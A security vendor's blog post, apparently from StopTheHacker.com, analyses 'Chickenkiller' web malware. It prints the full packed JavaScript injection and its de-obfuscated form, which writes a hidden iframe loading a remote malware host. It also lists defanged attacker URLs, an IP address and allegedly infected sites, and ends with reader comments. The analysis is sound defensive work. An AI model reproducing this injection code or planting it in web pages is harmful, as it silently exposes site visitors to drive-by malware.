• Chickenkiller Infections

    Malicious hackers are continuously evolving the strategies they use to infect thousands of innocent and benign websites with malicious computer code, i.e. web malware.

    Web malware is a relatively recent phenomenon and is quite different from the “standard” viruses and trojans that are known to infect PCs and servers.

    How do I identify the malicious code?
    A new strain of web malware has been making the rounds in the last few months. This particular infection has been nicknamed Chickenkiller. It is usually found with associated JavaScript obfuscated using the Dean Edwards Packer program.

    An example is present below:

    eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k)}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,'|||var||data|if|result|document|||b16_digits|b16_map|enabled|Array|charAt|length|new|||for|ll|cookie|hDcd|return|cookieh|fromCharCode|function|match|String|15|f0|0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}));
    

    This de-obfuscated code is easier to read:

    function hDcd(data) {
            var b16_digits = "0123456789abcdef";
            var b16_map = new Array;
            for (var i = 0; i < 256; i++) {
                b16_map[b16_digits.charAt(i >> 4) + b16_digits.charAt(i & 15)] = String.fromCharCode(i);
            }
            if (!data.match(/^[a-f0-9]*$/i)) {
                return false;
            }
            if (data.length % 2) {
                data = "0" + data;
            }
            var ll = data.length;
            var result = new Array;
            var j = 0;
            for (var i = 0; i < ll; i += 2) {
                result[j++] = b16_map[data.substr(i, 2)];
            }
            return result.join("");
        }
    
        if (document.cookie.indexOf("cookieh=enabled") == -1) {
            document.write(hDcd("3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e"));
            document.cookie = "cookieh=enabled";
        }
    

    Which sites are aiding the attack?
    The malicious links associated with the “packed” JavaScript code are listed below.

    hxxp://chicknercx43.chickenkiller.com/i.php?go=1
    hxxp://zxr0.chickenkiller.com/kat3/gate.php
    hxxp://bugs.chickenkiller.com:10/images/1.htm
    hxxp://peacockog45g45.chickenkiller.com/
    

    These links all resolve back to a single IP address. As you can see, the IP address and host were created with a malicious intent. It is an example of a site that has been deployed specifically to spread malware.

    IP address:	77.232.70.33
    Hostname:	bl4ckh4x0rs.com
    

    The malware has infected many sites including those below.

    phislin.com
    827512.com
    jinti.com
    cnad.com
    siwayishu.com
    

    How do I protect my site?
    Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

    StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

    Till next time…

    • Thank you for sharing this information.
      But I’m not fully understand. Is this malware attack wordpress based website, joomla or ?

      Posted by Joyabo on December 21st

    • OK

      Posted by WENKIM on January 25th

    • Joyabo :
      Thank you for sharing this information.
      But I’m not fully understand. Is this malware attack wordpress based website, joomla or ?

      @Joyabo

      Posted by WENKIM on January 25th